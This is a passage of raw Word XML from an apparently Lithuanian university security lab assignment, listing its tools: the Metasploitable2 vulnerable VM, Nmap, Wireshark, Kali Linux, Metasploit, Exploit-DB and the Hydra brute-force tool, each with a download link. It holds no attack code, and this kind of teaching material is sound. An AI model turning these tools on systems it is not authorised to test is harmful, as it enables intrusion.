    <w:p w14:paraId="22D70B80" w14:textId="10A6E965" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc306063734"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. Darbo priemonės</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0F98E" w14:textId="002298A2" w:rsidR="00110871" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtualios, pažeidžiamos Linux OS atvaizdas; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) failas </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Parsisiuntimas: </w:t>
      </w:r>
      <w:r w:rsidR="0027638B" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:strike/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0027638B" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:strike/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "ftp://158.12</w:instrText>
      </w:r>
      <w:r w:rsidR="0027638B" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:strike/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:instrText xml:space="preserve">9.35.88/pub/CEH/metalinux.tgz" </w:instrText>
      </w:r>
      <w:r w:rsidR="0027638B" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:strike/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Arial"/>
          <w:strike/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ftp://158.129.35.88/pub/CEH/metalinux.tgz</w:t>
      </w:r>
      <w:r w:rsidR="0027638B" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Arial"/>
          <w:strike/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:strike/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NEGALIOJA); </w:t>
      </w:r>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Spustelėkite </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://sourceforge.net/projects/metasploitable/files/Metasploitable2/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> saitą, kad atidarytumėte URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A462A9C" w14:textId="53FE45BE" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VMware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Workstation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Player</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nemokama) </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="001C123C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.vmware.com/products/workstation-player.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (arba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Filehippo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="001C123C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://filehippo.com/download_vmware-workstation-player/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D27E14" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> – tinklo srauto analizės programinė įranga;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B6F4D" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>zemap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) – tinklo paslaugų ir prievadų identifikavimo priemonė;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029B2FD" w14:textId="13C8F13F" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(papildomai) Kali Linux – savarankiškai dirbantiems galima pasitelkti „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“ Linux distribuciją tam, kad turėti visus reikiamus įrankius vienoje vietoje (</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.kali.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Svarbu, jei planuojate naudoti Windows OS, galite įdiegti visą reikiamą aplinką per Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Store</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nuo</w:t>
      </w:r>
      <w:r w:rsidR="005F3D0B" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">oda kaip tai padaryti: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.kali.org/news/kali-linux-in-the-windows-app-store/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA5AC8" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDBB8DC" w14:textId="135F9A49" w:rsidR="00F1495C" w:rsidRPr="00607DC0" w:rsidRDefault="00F1495C" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00474658" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> testavimo sistema bei kartu platforma</w:t>
      </w:r>
      <w:r w:rsidR="007D090F" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (karkasas)</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">, skirta apsaugos priemonėms ir pažeidžiamumų išnaudojimo kodams kurti. Šią sistemą visame pasaulyje naudoja daugelis tinklo saugumo specialistų, atlikdami įsibrovimo testus, sistemų administratorių, tikrindami ar teisingai </w:t>
      </w:r>
      <w:r w:rsidR="001B59D1" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įdiegti</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sisteminiai atnaujinimai, </w:t>
      </w:r>
      <w:r w:rsidR="001B59D1" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>programinės</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B59D1" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įrangos</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B59D1" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naujinimai</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Sistema sukurta naudojant „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Ruby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">“ programavimo kalbą, o išeinantys komponentai – įvairiomis kitomis kalbomis, pvz.: C, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>assembler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir pan. </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parsisiųsti:</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.metasploit.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASTABA: jei naudojate Kali Linux, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> karkasas yra sudiegtas pagal nutylėjimą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AEA880" w14:textId="0C114A30" w:rsidR="00FF542E" w:rsidRPr="00607DC0" w:rsidRDefault="00FF542E" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pažeidžiamumų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>duomebų</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> bazė </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57BF80" w14:textId="6230B377" w:rsidR="00DC2336" w:rsidRPr="00607DC0" w:rsidRDefault="00DC2336" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brutalios jėgos (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>brute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>foce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) įrankis </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://github.com/vanhauser-thc/thc-hydra</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC481D4" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Galima naudoti ir šiame sąraše nepateiktą programinę įrangą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB58DC4" w14:textId="7B3AC39F" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Braižymas (</w:t>
      </w:r>
